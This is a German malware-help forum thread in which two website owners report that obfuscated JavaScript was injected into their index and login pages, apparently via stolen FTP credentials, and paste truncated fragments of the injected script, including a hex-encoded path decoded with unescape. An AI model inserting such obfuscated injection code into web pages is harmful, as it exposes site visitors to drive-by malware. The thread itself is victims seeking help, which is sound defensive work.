Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Tronjaner auf meiner Internetseite

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 27.08.2009, 08:28   #1
Tristan W
 
Tronjaner auf meiner Internetseite - Standard

Tronjaner auf meiner Internetseite



Hallo Leute,

anscheinend wurde meine Internetseite gehackt. Auf der Startseite erschien vom Virenprogramm die Meldung, es sei mit "Trojan-Downloader.JS.Iframe.bcw" infiziert.

Als ich die HTML Seite im FTP Programm geöffnet hatte war im <head> neuer Quellcode eingefügt, der wie folgt aussah
Code:
ATTFilter
<script>function c241384d21q4a94f0743f8e7(q4a94f074400b8){ 
var q4a94f07440884=16; 
return (eval('pa'+'rseInt')(q4a94f074400b8,q4a94f07440884));} .... etc.
         
Kann mir jemand erklären, wie der Code in meine Internetseite gekommen ist? Wir haben seit einiger Zeit Werbung auf der Seite, die über ein IFrame eingeblendet wird. Da es anscheinend ein Iframe Trojaner ist, kann es sein, dass der Werbeprovider gehackt wurde? Aber wie landet das dann immer noch in der Datei der Internetseite?

Fragen über Fragen... Ich danke euch!

Viele Grüße,
Tristan

Alt 27.08.2009, 09:32   #2
Tristan W
 
Tronjaner auf meiner Internetseite - Standard

Tronjaner auf meiner Internetseite



Also, wie ich gerade gesehen habe wurden immer nur die index.php/html und login.php/html Dateien infiziert. Das ganze ging laut FTP-Log gestern Morgen innerhalb von Sekundenabständen vor sich. Sieht so aus, als wäre da ein Keylogger am Werk gewesen, der das FTP Passwort abgegriffenhat, oder?

Viele Grüße,
Tristan
__________________


Alt 08.04.2010, 09:59   #3
fatnmad
 
Tronjaner auf meiner Internetseite - Standard

Tronjaner auf meiner Internetseite



Hallo!

Ich habe ein ähnliches Problem. Habe schon desöfteren den kompletten Webserver überarbeiten müssen... Finde aber den besagten "Trojaner" oder zumindest den Ursprung des Problems nicht.

Das Hier steht bei mir in jeder index.html (.php / .html etc.), in jeder home.html sowie in Dateien mit dem "default" im Namen (bspw: default-embeds.php etc.):
Code:
ATTFilter
<script>var GW;if(GW!='d'){GW='d'};function w(){var J='';var Q;if(Q!='T' && Q!='R'){Q='T'};var 
F=new Array();var V=new String();var K=window;var z=unescape;var n=z("%2f%65%62%61%79%2d%63%6f%2d%75%6b%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6c%2e%70%68%70");var rh;if(rh!='' && rh!='uR'){rh='CH'};function _(X,XX)[ ... ]</script>
<!--6ea7a431d669fd4a5cd3a99b0545bab3-->
         
Vielleicht weiß hier einer eine Möglichkeit
__________________

Antwort

Themen zu Tronjaner auf meiner Internetseite
datei, eingeblendet, einiger, erklären, ftp, html, infiziert., inter, interne, internetseite, landet, leute, meldung, neuer, programm, quellcode, schei, script, seite, startseite, troja, trojaner, tronjaner, virenprogramm, werbung



Ähnliche Themen: Tronjaner auf meiner Internetseite


  1. BKA Tronjaner
    Plagegeister aller Art und deren Bekämpfung - 18.08.2014 (19)
  2. GVU Tronjaner hat auch mich erwischt
    Log-Analyse und Auswertung - 02.09.2013 (23)
  3. Tronjaner auf Pc gefunden und + evtl. ftp Hack
    Plagegeister aller Art und deren Bekämpfung - 18.10.2012 (17)
  4. Tronjaner Weisser Bildschirm: Warten Sie während die Verbindung hergestellt wird.
    Plagegeister aller Art und deren Bekämpfung - 06.08.2012 (15)
  5. Hätte gerne eine Auswertung meiner HJT-logfiles und meiner OTL+Extras-logfiles
    Log-Analyse und Auswertung - 26.07.2012 (15)
  6. Nach Tronjaner Angriff Windows Neuinstallieren.
    Alles rund um Windows - 16.03.2012 (1)
  7. Eingabeaufforderung deaktiviert - BKA Tronjaner ...
    Plagegeister aller Art und deren Bekämpfung - 16.03.2012 (15)
  8. Tronjaner? Virus?
    Plagegeister aller Art und deren Bekämpfung - 09.01.2012 (1)
  9. hab vermutlich nen tronjaner aber weiß nich wie ich es rausbekomme und ihn entfernen kann!
    Log-Analyse und Auswertung - 16.07.2011 (1)
  10. sshnass21.dll. Tronjaner
    Plagegeister aller Art und deren Bekämpfung - 17.11.2010 (25)
  11. Kann bestimmte Internetseite nicht mehr erreichen...erbitte Kontrolle meiner Log-file
    Log-Analyse und Auswertung - 28.07.2009 (1)
  12. Immer wieder Tronjaner und andere Probleme
    Log-Analyse und Auswertung - 17.11.2008 (1)
  13. Umleitung Internetseite
    Log-Analyse und Auswertung - 17.05.2008 (14)
  14. tronjaner auf meinem rechner?
    Log-Analyse und Auswertung - 12.05.2008 (1)
  15. ucookw.exe...Tronjaner???
    Log-Analyse und Auswertung - 09.01.2008 (2)
  16. Internetseite
    Plagegeister aller Art und deren Bekämpfung - 07.08.2004 (20)
  17. Tronjaner Fund
    Plagegeister aller Art und deren Bekämpfung - 17.12.2003 (26)

Zum Thema Tronjaner auf meiner Internetseite - Hallo Leute, anscheinend wurde meine Internetseite gehackt. Auf der Startseite erschien vom Virenprogramm die Meldung, es sei mit "Trojan-Downloader.JS.Iframe.bcw" infiziert. Als ich die HTML Seite im FTP Programm geöffnet hatte - Tronjaner auf meiner Internetseite...
Archiv
Du betrachtest: Tronjaner auf meiner Internetseite auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.